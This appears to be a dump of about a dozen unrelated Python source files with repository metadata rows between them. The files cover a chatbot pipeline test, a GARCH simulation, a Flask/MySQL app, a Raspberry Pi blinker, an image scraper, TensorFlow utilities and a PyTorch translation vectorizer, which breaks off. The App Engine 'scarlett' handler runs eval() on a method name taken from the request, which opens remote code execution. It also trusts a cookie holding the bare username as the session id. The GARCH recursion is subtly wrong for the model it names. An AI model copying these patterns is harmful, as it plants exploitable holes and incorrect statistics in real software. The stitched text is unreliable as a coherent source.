            # best, which you can check by using num_return_sequences=10
            # " Hello! How are you? I'm just getting ready to go to work, how about you?",
" Hello! How are you doing today? I just got back from a walk with my dog.",
)
conversation_1 = Conversation("Lasagne hello")
result = conversation_agent(conversation_1, encoder_no_repeat_ngram_size=3)
self.assertEqual(
result.generated_responses[0],
" Do you like lasagne? It is a traditional Italian dish consisting of a shepherd's pie.",
)
conversation_1 = Conversation(
"Lasagne hello Lasagne is my favorite Italian dish. Do you like lasagne? I like lasagne."
)
result = conversation_agent(
conversation_1,
encoder_no_repeat_ngram_size=3,
)
self.assertEqual(
result.generated_responses[0],
" Me too. I like how it can be topped with vegetables, meats, and condiments.",
)
@require_torch
@slow
def test_integration_torch_conversation_encoder_decoder(self):
# When
tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot_small-90M")
model = AutoModelForSeq2SeqLM.from_pretrained("facebook/blenderbot_small-90M")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer, device=DEFAULT_DEVICE_NUM)
conversation_1 = Conversation("My name is Sarah and I live in London")
conversation_2 = Conversation("Going to the movies tonight, What movie would you recommend? ")
# Then
self.assertEqual(len(conversation_1.past_user_inputs), 0)
self.assertEqual(len(conversation_2.past_user_inputs), 0)
# When
result = conversation_agent([conversation_1, conversation_2], do_sample=False, max_length=1000)
# Then
self.assertEqual(result, [conversation_1, conversation_2])
self.assertEqual(len(result[0].past_user_inputs), 1)
self.assertEqual(len(result[1].past_user_inputs), 1)
self.assertEqual(len(result[0].generated_responses), 1)
self.assertEqual(len(result[1].generated_responses), 1)
self.assertEqual(result[0].past_user_inputs[0], "My name is Sarah and I live in London")
self.assertEqual(
result[0].generated_responses[0],
"hi sarah, i live in london as well. do you have any plans for the weekend?",
)
self.assertEqual(
result[1].past_user_inputs[0], "Going to the movies tonight, What movie would you recommend? "
)
self.assertEqual(
result[1].generated_responses[0], "i don't know... i'm not really sure. what movie are you going to see?"
)
# When
conversation_1.add_user_input("Not yet, what about you?")
conversation_2.add_user_input("What's your name?")
result = conversation_agent([conversation_1, conversation_2], do_sample=False, max_length=1000)
# Then
self.assertEqual(result, [conversation_1, conversation_2])
self.assertEqual(len(result[0].past_user_inputs), 2)
self.assertEqual(len(result[1].past_user_inputs), 2)
self.assertEqual(len(result[0].generated_responses), 2)
self.assertEqual(len(result[1].generated_responses), 2)
self.assertEqual(result[0].past_user_inputs[1], "Not yet, what about you?")
self.assertEqual(result[0].generated_responses[1], "i don't have any plans yet. i'm not sure what to do yet.")
self.assertEqual(result[1].past_user_inputs[1], "What's your name?")
self.assertEqual(result[1].generated_responses[1], "i don't have a name, but i'm going to see a horror movie.")
@require_torch
@slow
def test_from_pipeline_conversation(self):
model_id = "facebook/blenderbot_small-90M"
# from model id
conversation_agent_from_model_id = pipeline("conversational", model=model_id, tokenizer=model_id)
# from model object
model = BlenderbotSmallForConditionalGeneration.from_pretrained(model_id)
tokenizer = BlenderbotSmallTokenizer.from_pretrained(model_id)
conversation_agent_from_model = pipeline("conversational", model=model, tokenizer=tokenizer)
conversation = Conversation("My name is Sarah and I live in London")
conversation_copy = Conversation("My name is Sarah and I live in London")
result_model_id = conversation_agent_from_model_id([conversation])
result_model = conversation_agent_from_model([conversation_copy])
# check for equality
self.assertEqual(
result_model_id.generated_responses[0],
"hi sarah, i live in london as well. do you have any plans for the weekend?",
)
self.assertEqual(
result_model_id.generated_responses[0],
result_model.generated_responses[0],
)
| [
"[email protected]"
] | |
9d601337b6dc895c927f933e062c2575796415e6 | 2327d0bc2cc45a5504c39109846e0f4cba266606 | /QID-1799-SFEtimegarch/SFEtimegarch.py | 362457032fb2eddfb6adae28a3bbcca837f3cc90 | [] | no_license | QuantLet/SFE | 3d98a33cfcdc533210856c7618c32a78e111a6ce | d25a728a4371538eae982f44ea811b5b93328828 | refs/heads/master | 2022-06-15T13:35:17.387252 | 2022-06-08T01:22:00 | 2022-06-08T01:22:00 | 72,103,182 | 12 | 32 | null | 2022-01-30T18:58:21 | 2016-10-27T11:50:43 | R | UTF-8 | Python | false | false | 702 | py | import numpy as np
import matplotlib.pyplot as plt
#
np.random.seed(1234)
# omega = 0.1, alpha1 = 0.3, beta = 0.8 (see the coefficients set below)
n=1000 # number of observations
n1=100 # drop first observations
alpha=(0.1,0.3) # GARCH (1,1) coefficients alpha0 and alpha1
beta=0.8
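# Simulated recursion (as implemented below):
#   y_t = eps_t * sigma_t with sigma_t^2 = alpha0 + alpha1*eps_{t-1}^2 + beta*y_{t-1}^2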
errors=np.random.normal(0,1,n+n1)
t=np.zeros(n+n1)
t[0]=np.random.normal(0,np.sqrt(alpha[0]/(1-alpha[1])))  # scalar draw for the starting value
# iterate over the observations
for i in range(1,n+n1):
t[i]=errors[i]*np.sqrt(alpha[0]+alpha[1]*errors[i-1]**2+beta*t[i-1]**2)
#
y=t[n1:] # drop the first n1 burn-in observations
plt.title('GARCH (1,1) process')
x=range(n)
plt.plot(x,y)
plt.xlabel('time')
plt.ylabel('y')
plt.savefig('SFEtimegarch_py.png')
plt.show() | [
"[email protected]"
] | |
4eaeed1619b3dcb639ee308019b90729a7124038 | bfc1b107b2ce8c664b17be7d96b93bf69aaa8665 | /lab_10_zadania/07.py | aea5b665b965041edf2d9d5e29141733e6f9acc7 | [] | no_license | bulwan/wizualizacja_danych | db16c97da765646a71a8a794030f8014022cbc19 | e305914105f42d22d42deb4e10a09b181534254f | refs/heads/main | 2023-05-01T07:16:23.954859 | 2021-05-26T11:59:18 | 2021-05-26T11:59:18 | 346,389,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 685 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plik = pd.ExcelFile('imiona.xlsx')
imiona = pd.read_excel(plik,'Arkusz1')
kobiet=imiona[(imiona.Plec=='K')]
chlopcy=imiona[(imiona.Plec=='M')]
wynik_dziewczynki = kobiet.groupby(['Rok']).sum()
wynik_chlopcy = chlopcy.groupby(['Rok']).sum()
wynik_dziewczynki=wynik_dziewczynki.reset_index()
wynik_chlopcy=wynik_chlopcy.reset_index()
plt.xticks(np.arange(2000, 2018, 1))
plt.bar(wynik_dziewczynki.Rok,wynik_dziewczynki.Liczba, label="girls", color='pink')
plt.bar(wynik_chlopcy.Rok,wynik_chlopcy.Liczba, label="boys", color='blue', bottom=wynik_dziewczynki.Liczba)
plt.legend()
plt.show() | [
"[email protected]"
] | |
6bc8e6bda70fb29b075f4f3c8c40b9a6b2656fcf | 9c6e63eb1796bbf4c37d93fca941fb67b4cd4741 | /trunk/scarlett/app.py | 7f7179015d2a9cefbdbe4557f2fd080029521298 | [] | no_license | BGCX261/zizw-svn-to-git | ffc6636d8e0d91b24f124ba3d16c61af10d7441c | c8d068af7a36396ce707dc035b15330c77b02f2a | refs/heads/master | 2016-09-05T13:11:22.053860 | 2015-08-25T15:51:45 | 2015-08-25T15:51:45 | 41,585,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,466 | py |
import logging
import webob
import wsgiref.handlers
import simplejson.encoder
import simplejson.decoder
from google.appengine.ext import db
from google.appengine.api import users
from scarlett import model
from scarlett import utils
jsonEncoder = simplejson.encoder.JSONEncoder()
jsonDecoder = simplejson.decoder.JSONDecoder()
def scarlett(environ, start_response):
#
# create request & response objects
#
request = webob.Request(environ)
response = webob.Response()
#
# create session object
#
session = Session(request)
    # dispatch on the message channel
channel = session.message["channel"]
if channel == "refresh":
if session.isAdmin:
response.body = shell % ("Scarlett-Admin", "scarlett.Admin")
elif session.user:
response.body = shell % ("Scarlett", "scarlett.Main")
else:
response.body = shell % ("Login", "scarlett.Login")
elif channel == "locateservice":
fullName = str(session.message["fullName"])
service = utils.my_import(fullName)
simpleName = fullName.split('.')[-1]
response.body = generateServiceStub(service, fullName, simpleName)
response.content_type = "text/plain"
response.charset = "UTF-8"
elif channel == "rmi":
fullName = str(session.message["serviceName"])
methodName = str(session.message["methodName"])
args = session.message["args"];
argList = ""
for i in range(len(args)):
argList += "args[%s], " % i
argList = argList[:-2]
service = utils.my_import(fullName)
outMessage = {
"result": eval("service."+methodName+"(session, "+argList+")")
}
if fullName == "scarlett.admin" and methodName == "login" and outMessage["result"]:
response.set_cookie("sid", userToSid(args[0]))
response.body = jsonEncoder.encode(outMessage)
response.content_type = "text/plain"
response.charset = "UTF-8"
elif channel == "admin":
user = users.get_current_user()
if not user:
response.body = users.create_login_url("/")
logging.info("admin: do login")
else:
response.body = "/"
logging.info("admin: do normal")
else:
response.body = "unknown channel: %s" % str(channel)
#
return response(environ, start_response)
#
# Tips:
# session.message
# session.message.channel
# session.isAdmin
# session.user
# session.user.alias
#
class Session():
def __init__(self, request):
#
# setting message
#
if request.method == "GET":
self.message = {"channel":"refresh"}
else:
self.message = jsonDecoder.decode(request.body)
#
# setting isAdmin & user
#
if users.is_current_user_admin():
self.isAdmin = True
self.user = None
elif "sid" not in request.cookies:
self.isAdmin = False
self.user = None
elif not request.cookies["sid"]:
self.isAdmin = False
self.user = None
else:
self.isAdmin = False
self.user = sidToUser(request.cookies["sid"])
def sidToUser(sid):
#
# TODO: a real sid should be used
#
return model.User.get(db.Key.from_path("User", "ID_"+sid, _app="scarlett"))
def userToSid(userName):
#
# TODO: a real sid should be used
#
return userName
def generateServiceStub(service, fullName, simpleName):
methodList= filter(lambda x : x[0:1]!= "_", dir(service))
stub = "var " + simpleName + " = function(){\n"
stub += "}\n\n"
for method in methodList:
stub += simpleName + ".prototype." + method + " = function() {\n"
stub += "\treturn jsloader.doRmi('%s', '%s', arguments);\n" % (fullName, method)
stub += "};\n"
return stub
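# For example, a module "scarlett.admin" exposing login/logout methods would
# produce a JavaScript stub along these lines (illustrative; the method names
# here are assumptions):
#   var admin = function(){
#   }
#   admin.prototype.login = function() {
#       return jsloader.doRmi('scarlett.admin', 'login', arguments);
#   };
#   admin.prototype.logout = function() {
#       return jsloader.doRmi('scarlett.admin', 'logout', arguments);
#   };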
def main():
wsgiref.handlers.CGIHandler().run(scarlett)
shell = """
<html>
<head>
<title>%s</title>
<script>
var App = null;
var app = null;
function init() {
App = jsloader.resolve("%s")
app = new App(document.body);
var welcome = document.getElementById("welcome");
document.body.removeChild(welcome);
}
function destroy() {
app.destroy();
}
</script>
</head>
<body scroll="no" style="overflow: hidden; margin: 0px; padding: 0px" onload="init()" onunload="destroy()">
<span id="welcome">Loading ...</span>
</body>
<script src="js/lang/JSLoader.js"></script>
</html>
"""
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
d1b3168fa1a02ae0a1f8d21fb8cfd7e4a2da5d51 | bbdf70d28a5df9e337522ecdfcf04a470f6d2675 | /01_LED_Blink.py | 8a6e0ded30d32b0c27944a9fd0000ad9790ae8cf | [] | no_license | ankurm97/blink-py | 376c7e8eec38fe5cac5454802563966e8778b451 | 75bd31cbb0ad933a6790a7dc4fcfbe79ed6042a3 | refs/heads/master | 2022-11-14T11:52:04.585283 | 2020-07-08T07:38:21 | 2020-07-08T07:38:21 | 278,022,134 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # sudo apt-get install python3-rpi.gpio
import RPi.GPIO as GPIO
from time import sleep
GPIO.setwarnings(False) # Ignore Warnings
GPIO.setmode(GPIO.BOARD) # Use Physical Pin Numbering
GPIO.setup(8, GPIO.OUT, initial=GPIO.LOW)
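# physical (BOARD) pin 8 corresponds to BCM GPIO14 / UART TXD on the Pi header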
while True:
GPIO.output(8, GPIO.HIGH)
sleep(1)
GPIO.output(8, GPIO.LOW)
sleep(1)
| [
"[email protected]"
] | |
ad232b4ee33908d60b0a9a445eccd44352cff4f9 | 4d4ef69dc8a0237973dde5ce0768cf21f043f717 | /Download image automatically.py | 674716ea927e334672127be0abeb83a8f0c5c51f | [] | no_license | zh-cse18/Selenium_Webdriver_Operation | b3b02adb4762e5b2c61e05d9211e3d90725fae42 | dd001057d84aae0fbaed062fea4725e0e3bea2cc | refs/heads/master | 2023-07-20T08:13:07.690387 | 2023-07-10T09:59:59 | 2023-07-10T09:59:59 | 230,744,441 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,463 | py | import os
import json
import requests # to sent GET requests
from bs4 import BeautifulSoup # to parse HTML
# user can input a topic and a number
# download first n images from google image search
GOOGLE_IMAGE = \
'https://www.google.com/search?site=&tbm=isch&source=hp&biw=1873&bih=990&'
# The User-Agent request header contains a characteristic string
# that allows the network protocol peers to identify the application type,
# operating system, and software version of the requesting software user agent.
# needed for google search
usr_agent = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive',
}
SAVE_FOLDER = 'images'
def main():
if not os.path.exists(SAVE_FOLDER):
os.mkdir(SAVE_FOLDER)
download_images()
def download_images():
# ask for user input
data = input('What are you looking for? ')
n_images = int(input('How many images do you want? '))
print('Start searching...')
# get url query string
searchurl = GOOGLE_IMAGE + 'q=' + data
print(searchurl)
# request url, without usr_agent the permission gets denied
response = requests.get(searchurl, headers=usr_agent)
html = response.text
# find all divs where class='rg_meta'
soup = BeautifulSoup(html, 'html.parser')
results = soup.findAll('div', {'class': 'rg_meta'}, limit=n_images)
# extract the link from the div tag
imagelinks = []
    for result in results:
        text = result.text  # this is a valid json string
        text_dict = json.loads(text)  # deserialize json to a Python dict
        link = text_dict['ou']
# image_type = text_dict['ity']
imagelinks.append(link)
print(f'found {len(imagelinks)} images')
print('Start downloading...')
for i, imagelink in enumerate(imagelinks):
# open image link and save as file
response = requests.get(imagelink)
imagename = SAVE_FOLDER + '/' + data + str(i + 1) + '.jpg'
with open(imagename, 'wb') as file:
file.write(response.content)
print('Done')
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
2e0aeb4b8cd540d392f6e5256c8fc9f78b3b1f04 | 0144353f5d129c0d95f96c717c9aee71d26ca153 | /app_mysql.py | 3e5c0f5eea15619e2f75aef0c838311ca947c354 | [] | no_license | rafat2427/IDP | 4b44239f3cb6b52d11baf47c97b49aa38ec7e5b5 | 16c02be0244cbf32e7d94363e3af40d3c447311d | refs/heads/main | 2023-02-16T17:53:11.009820 | 2021-01-20T20:04:10 | 2021-01-20T20:04:10 | 331,417,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,252 | py | from flask import Flask, render_template, url_for, request, redirect
from flask_mysqldb import MySQL
import pandas as pd
import numpy as np
import os.path
# import yaml
app = Flask(__name__)
# Configure db
# db = yaml.load(open('db.yaml'))
# app.config['MYSQL_HOST'] = db['mysql_host']
# app.config['MYSQL_USER'] = db['mysql_user']
# app.config['MYSQL_PASSWORD'] = db['mysql_password']
# app.config['MYSQL_DB'] = db['mysql_db']
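# a matching db.yaml for the commented-out variant above might look like
# (illustrative):
#   mysql_host: 'localhost'
#   mysql_user: 'root'
#   mysql_password: ''
#   mysql_db: 'test'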
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = ''
app.config['MYSQL_DB'] = 'test'
mysql = MySQL(app)
# Start coding
# @app.route('/')
# def index():
# return render_template("about.php")
#
#
# @app.route('/users')
# def users():
# cur = mysql.connection.cursor()
# resultValue = cur.execute("SELECT * FROM users")
# if resultValue > 0:
# userDetails = cur.fetchall()
# return render_template('users.html',userDetails=userDetails)
@app.route('/')
# @app.route('/', methods=['GET', 'POST'])
def index():
# if request.method == 'POST':
# # Fetch form data
# userDetails = request.form
# name = userDetails['name']
# email = userDetails['email']
# cur = mysql.connection.cursor()
# cur.execute("INSERT INTO users(name, email) VALUES(%s, %s)",(name, email))
# mysql.connection.commit()
# cur.close()
# return redirect('/users')
# return render_template('index.html')
#
# @app.route('/users')
# def users():
cur_member = mysql.connection.cursor()
cur_gp = mysql.connection.cursor()
resultValue = cur_member.execute("SELECT * FROM members")
groupValue = cur_gp.execute("SELECT * FROM gp")
if resultValue > 0 or groupValue > 0:
userDetails = cur_member.fetchall()
groupDetails = cur_gp.fetchall()
return render_template('members group.php',userDetails=userDetails, groupDetails=groupDetails)
@app.route('/show')
def show_data():
csv1 = pd.read_csv("status_1.csv")
print(csv1)
val_list = csv1.values.tolist()
c_yes=val_list.count('Yes')
c_no=val_list.count('No')
state=1
if c_no > c_yes:
state = 2
return render_template('show_status.php',val_list=val_list,c_yes=c_yes,c_no=c_no)
@app.route('/status')
def show_status():
csv1 = pd.read_csv("status_1.csv")
print(csv1)
val_list = csv1.values.tolist()
c_yes=val_list.count('Yes')
c_no=val_list.count('No')
# state=1
# if c_no > c_yes
# state = 2
state = 2
cur_state = mysql.connection.cursor()
cur_member = mysql.connection.cursor()
cur_gp = mysql.connection.cursor()
cur_state.execute("UPDATE `status` SET `sta_id` = %s WHERE `status`.`persno` = 12345 ", state)
resultValue = cur_member.execute("SELECT * FROM members")
groupValue = cur_gp.execute("SELECT * FROM status")
if resultValue > 0 or groupValue > 0:
userDetails = cur_member.fetchall()
groupDetails = cur_gp.fetchall()
return render_template('members group.php',userDetails=userDetails, groupDetails=groupDetails)
if __name__ == '__main__':
app.run(debug=True)
| [
"[email protected]"
] | |
d519581682c5b4acb68ab1878e3cda3a7b8c4ddd | 5e2655fb23e558c54695dea5c9456b5552570947 | /localdev/seed/management/commands/seed_data.py | f42ad2be00ea5d9f4f5111900de0d82b66bf4e16 | [
"BSD-3-Clause"
] | permissive | mitodl/bootcamp-ecommerce | 992cb23243462d82c75cfae6c115a27728491219 | 339c67b84b661a37ffe32580da72383d95666c5c | refs/heads/master | 2023-08-31T10:45:57.827990 | 2023-07-25T13:55:32 | 2023-07-25T13:55:32 | 82,849,185 | 6 | 3 | BSD-3-Clause | 2023-08-24T20:25:47 | 2017-02-22T20:27:24 | Python | UTF-8 | Python | false | false | 709 | py | """Management command to create or update seed data"""
from django.core.management.base import BaseCommand
from localdev.seed.api import create_seed_data
from localdev.seed.utils import get_raw_seed_data_from_file
class Command(BaseCommand):
"""Creates or updates seed data based on a raw seed data file"""
help = __doc__
def handle(self, *args, **options):
raw_seed_data = get_raw_seed_data_from_file()
results = create_seed_data(raw_seed_data)
if not results.has_results:
self.stdout.write(self.style.WARNING("No results logged."))
else:
self.stdout.write(self.style.SUCCESS("RESULTS"))
self.stdout.write(results.report)
| [
"[email protected]"
] | |
ad890fdf5086260c3c073c0dee7db830b7db3d9a | d33bd7e0c2cd91226d3dc7c3d927a52b8dbc05fd | /tiny_data/lip3x3_tiny/utils.py | a5f41725c9023fb3c1334631a8da4d29a58eb2e8 | [
"Apache-2.0"
] | permissive | gamedx/tiny_lips | 80d7963abd9b8455aedcc342562f7ff55f6c501b | c15e1d152369ea69715313f6b6802ed05eab2b65 | refs/heads/master | 2020-06-29T17:59:25.717198 | 2019-08-05T07:57:03 | 2019-08-05T07:57:03 | 200,585,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,914 | py | import os
import scipy
import numpy as np
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"]="0"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def load_mnist(batch_size, is_training=True):
path = os.path.join('data', 'mnist')
if is_training:
fd = open(os.path.join(path, 'train-images-idx3-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
trainX = loaded[16:].reshape((8400, 39, 39, 1)).astype(np.float32)
fd = open(os.path.join(path, 'train-labels-idx1-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
trainY = loaded[8:].reshape((8400)).astype(np.int32)
trX = trainX[:7800] / 255.
trY = trainY[:7800]
valX = trainX[7800:, ] / 255.
valY = trainY[7800:]
num_tr_batch = 7800 // batch_size
num_val_batch = 600 // batch_size
return trX, trY, num_tr_batch, valX, valY, num_val_batch
else:
fd = open(os.path.join(path, 't10k-images-idx3-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
        teX = loaded[16:].reshape((600, 39, 39, 1)).astype(np.float32)  # np.float is removed in NumPy >= 1.24
fd = open(os.path.join(path, 't10k-labels-idx1-ubyte'))
loaded = np.fromfile(file=fd, dtype=np.uint8)
teY = loaded[8:].reshape((600)).astype(np.int32)
num_te_batch = 600 // batch_size
return teX / 255., teY, num_te_batch
def load_data(dataset, batch_size, is_training=True, one_hot=False):
if dataset == 'mnist':
return load_mnist(batch_size, is_training)
else:
raise Exception('Invalid dataset, please check the name of dataset:', dataset)
def get_batch_data(dataset, batch_size, num_threads):
if dataset == 'mnist':
trX, trY, num_tr_batch, valX, valY, num_val_batch = load_mnist(batch_size, is_training=True)
    else:
        raise Exception('Invalid dataset, please check the name of dataset:', dataset)
data_queues = tf.train.slice_input_producer([trX, trY])
X, Y = tf.train.shuffle_batch(data_queues, num_threads=num_threads,
batch_size=batch_size,
capacity=batch_size * 64,
min_after_dequeue=batch_size * 32,
allow_smaller_final_batch=False)
return(X, Y)
def save_images(imgs, size, path):
'''
Args:
imgs: [batch_size, image_height, image_width]
size: a list with tow int elements, [image_height, image_width]
path: the path to save images
'''
imgs = (imgs + 1.) / 2 # inverse_transform
return(scipy.misc.imsave(path, mergeImgs(imgs, size)))
def mergeImgs(images, size):
h, w = images.shape[1], images.shape[2]
imgs = np.zeros((h * size[0], w * size[1], 3))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
imgs[j * h:j * h + h, i * w:i * w + w, :] = image
return imgs
# For version compatibility
def reduce_sum(input_tensor, axis=None, keepdims=False):
try:
return tf.reduce_sum(input_tensor, axis=axis, keepdims=keepdims)
except:
return tf.reduce_sum(input_tensor, axis=axis, keep_dims=keepdims)
# For version compatibility
def softmax(logits, axis=None):
try:
return tf.nn.softmax(logits, axis=axis)
except:
return tf.nn.softmax(logits, dim=axis)
def get_shape(inputs, name=None):
name = "shape" if name is None else name
with tf.name_scope(name):
static_shape = inputs.get_shape().as_list()
dynamic_shape = tf.shape(inputs)
shape = []
for i, dim in enumerate(static_shape):
dim = dim if dim is not None else dynamic_shape[i]
shape.append(dim)
return(shape)
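if __name__ == "__main__":
    # minimal sanity check for get_shape (illustrative; assumes TF 1.x, which
    # matches the tf.train.* queue APIs used above)
    x = tf.placeholder(tf.float32, shape=[None, 39, 39, 1])
    print(get_shape(x))  # [<dynamic batch-size tensor>, 39, 39, 1]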
| [
"[email protected]"
] | |
c7040497fddc70804c791aa8caffd6ee49621d0d | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_2/hbbirf001/question3.py | 86f1543deb5d0d08303893c1de5d53fe0d63e38e | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import math
pi =2
denom = math.sqrt(2)
while denom != 2:
pi = pi*2/denom
denom = math.sqrt(2+denom)
print('Approximation of pi:',round(pi,3),sep=' ')
radius = eval(input('Enter the radius:\n'))
area = pi*radius**2
print('Area:', round(area,3)) | [
"[email protected]"
] | |
d09f267b12df0380d0b55ee7ff1d47fd0d49c160 | ed5b7eab164bf434e500e38a946fc902ee7eac47 | /nlp_pytorch/chapter8/main.py | 1ea8ba0c5f33c97ac1a6d2881e8883968b48c07c | [] | no_license | happybear1234/machine-learning | 54269397cb02932368dbfcebb1fdf6cb2829d9e0 | 675ff6753771e2167c2a5179b1ffe49a918e478d | refs/heads/master | 2022-02-27T21:45:50.401754 | 2019-07-15T09:21:04 | 2019-07-15T09:21:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,207 | py | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main
Description :
Author : haxu
date: 2019/4/14
-------------------------------------------------
Change Activity:
2019/4/14:
-------------------------------------------------
"""
__author__ = 'haxu'
from argparse import Namespace
import json
import pandas as pd
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
from torch import nn
from torch.nn import functional as F
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch import optim
class Vocabulary(object):
def __init__(self, token_to_idx=None):
if token_to_idx is None:
token_to_idx = {}
self._token_to_idx = token_to_idx
self._idx_to_token = {idx: token
for token, idx in self._token_to_idx.items()}
def to_serializable(self):
return {'token_to_idx': self._token_to_idx}
@classmethod
def from_serializable(cls, contents):
return cls(**contents)
def add_token(self, token):
if token in self._token_to_idx:
index = self._token_to_idx[token]
else:
index = len(self._token_to_idx)
self._token_to_idx[token] = index
self._idx_to_token[index] = token
return index
def add_many(self, tokens):
return [self.add_token(token) for token in tokens]
def lookup_token(self, token):
return self._token_to_idx[token]
def lookup_index(self, index):
if index not in self._idx_to_token:
raise KeyError("the index (%d) is not in the Vocabulary" % index)
return self._idx_to_token[index]
def __str__(self):
return "<Vocabulary(size=%d)>" % len(self)
def __len__(self):
return len(self._token_to_idx)
class SequenceVocabulary(Vocabulary):
def __init__(self, token_to_idx=None, unk_token="<UNK>",
mask_token="<MASK>", begin_seq_token="<BEGIN>",
end_seq_token="<END>"):
super(SequenceVocabulary, self).__init__(token_to_idx)
self._mask_token = mask_token
self._unk_token = unk_token
self._begin_seq_token = begin_seq_token
self._end_seq_token = end_seq_token
self.mask_index = self.add_token(self._mask_token)
self.unk_index = self.add_token(self._unk_token)
self.begin_seq_index = self.add_token(self._begin_seq_token)
self.end_seq_index = self.add_token(self._end_seq_token)
def to_serializable(self):
contents = super(SequenceVocabulary, self).to_serializable()
contents.update({'unk_token': self._unk_token,
'mask_token': self._mask_token,
'begin_seq_token': self._begin_seq_token,
'end_seq_token': self._end_seq_token})
return contents
def lookup_token(self, token):
if self.unk_index >= 0:
return self._token_to_idx.get(token, self.unk_index)
else:
return self._token_to_idx[token]
class NMTVectorizer(object):
def __init__(self, source_vocab, target_vocab, max_source_length, max_target_length):
"""
Args:
source_vocab (SequenceVocabulary): maps source words to integers
target_vocab (SequenceVocabulary): maps target words to integers
max_source_length (int): the longest sequence in the source dataset
max_target_length (int): the longest sequence in the target dataset
"""
self.source_vocab = source_vocab
self.target_vocab = target_vocab
self.max_source_length = max_source_length
self.max_target_length = max_target_length
def _vectorize(self, indices, vector_length=-1, mask_index=0):
"""Vectorize the provided indices
Args:
indices (list): a list of integers that represent a sequence
vector_length (int): an argument for forcing the length of index vector
mask_index (int): the mask_index to use; almost always 0
"""
if vector_length < 0:
vector_length = len(indices)
        vector = np.zeros(vector_length, dtype=np.int64)  # np.int was removed in NumPy >= 1.24
vector[:len(indices)] = indices
vector[len(indices):] = mask_index
return vector
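    # e.g. _vectorize([2, 14, 8, 3], vector_length=7, mask_index=0)
    #   -> array([2, 14, 8, 3, 0, 0, 0])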
def _get_source_indices(self, text):
"""Return the vectorized source text
Args:
text (str): the source text; tokens should be separated by spaces
Returns:
indices (list): list of integers representing the text
"""
indices = [self.source_vocab.begin_seq_index]
indices.extend(self.source_vocab.lookup_token(token) for token in text.split(" "))
indices.append(self.source_vocab.end_seq_index)
return indices
def _get_target_indices(self, text):
"""Return the vectorized source text
Args:
text (str): the source text; tokens should be separated by spaces
Returns:
a tuple: (x_indices, y_indices)
x_indices (list): list of integers representing the observations in target decoder
y_indices (list): list of integers representing predictions in target decoder
"""
indices = [self.target_vocab.lookup_token(token) for token in text.split(" ")]
x_indices = [self.target_vocab.begin_seq_index] + indices
y_indices = indices + [self.target_vocab.end_seq_index]
return x_indices, y_indices
def vectorize(self, source_text, target_text, use_dataset_max_lengths=True):
source_vector_length = -1
target_vector_length = -1
if use_dataset_max_lengths:
            source_vector_length = self.max_source_length + 2  # room for <BEGIN> and <END>
            target_vector_length = self.max_target_length + 1  # room for <BEGIN> (input) or <END> (target)
source_indices = self._get_source_indices(source_text)
source_vector = self._vectorize(source_indices,
vector_length=source_vector_length,
mask_index=self.source_vocab.mask_index)
target_x_indices, target_y_indices = self._get_target_indices(target_text)
target_x_vector = self._vectorize(target_x_indices,
vector_length=target_vector_length,
mask_index=self.target_vocab.mask_index)
target_y_vector = self._vectorize(target_y_indices,
vector_length=target_vector_length,
mask_index=self.target_vocab.mask_index)
return {"source_vector": source_vector,
"target_x_vector": target_x_vector,
"target_y_vector": target_y_vector,
"source_length": len(source_indices)}
@classmethod
def from_dataframe(cls, bitext_df):
source_vocab = SequenceVocabulary()
target_vocab = SequenceVocabulary()
max_source_length = 0
max_target_length = 0
for _, row in bitext_df.iterrows():
source_tokens = row["source_language"].split(" ")
if len(source_tokens) > max_source_length:
max_source_length = len(source_tokens)
for token in source_tokens:
source_vocab.add_token(token)
target_tokens = row["target_language"].split(" ")
if len(target_tokens) > max_target_length:
max_target_length = len(target_tokens)
for token in target_tokens:
target_vocab.add_token(token)
return cls(source_vocab, target_vocab, max_source_length, max_target_length)
@classmethod
def from_serializable(cls, contents):
source_vocab = SequenceVocabulary.from_serializable(contents["source_vocab"])
target_vocab = SequenceVocabulary.from_serializable(contents["target_vocab"])
return cls(source_vocab=source_vocab,
target_vocab=target_vocab,
max_source_length=contents["max_source_length"],
max_target_length=contents["max_target_length"])
def to_serializable(self):
return {"source_vocab": self.source_vocab.to_serializable(),
"target_vocab": self.target_vocab.to_serializable(),
"max_source_length": self.max_source_length,
"max_target_length": self.max_target_length}
class NMTDataset(Dataset):
def __init__(self, text_df, vectorizer):
self.text_df = text_df
self._vectorizer = vectorizer
self.train_df = self.text_df[self.text_df.split == 'train']
self.train_size = len(self.train_df)
